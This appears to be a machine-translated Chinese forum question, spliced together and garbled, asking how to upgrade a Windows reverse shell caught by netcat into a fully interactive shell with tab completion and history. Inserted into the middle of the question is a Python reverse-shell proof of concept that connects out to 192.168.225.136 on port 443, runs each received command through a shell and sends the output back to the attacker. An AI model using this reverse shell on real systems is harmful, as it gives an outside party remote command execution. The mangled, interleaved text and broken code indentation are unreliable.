我在Windows上玩这个游戏,netcat在第二台设备上监听:
ShortRefControls来源: https://www.trustedsec.com/files/RevShell_PoC_v1.py
有没有办法产生一个完全交互式的#!/usr/bin/python
import socket
import subprocess
HOST = '192.168.225.136' # The remote host
PORT = 443 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# loop forever
while 1:
# recv command line param
data = s.recv(1024)
# execute command line
proc = subprocess.Popen(data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# grab output from commandline
stdout_value = proc.stdout.read() + proc.stderr.read()
# send back to attacker
s.send(stdout_value)
# quit out afterwards and kill socket
s.close()
shell?如果没有锁定,我什至无法运行cmd.exe命令,因为它需要输入。任何期望输入的命令只会导致其停顿直到time。
最好有一些提示(即^C), tab 完成,↑历史记录,就像是适当的tty一样。我发现了一些适用于Unix和Linux上的C:\>和/bin/sh的技术,但是到目前为止,对于Windows /bin/bash来说还没有。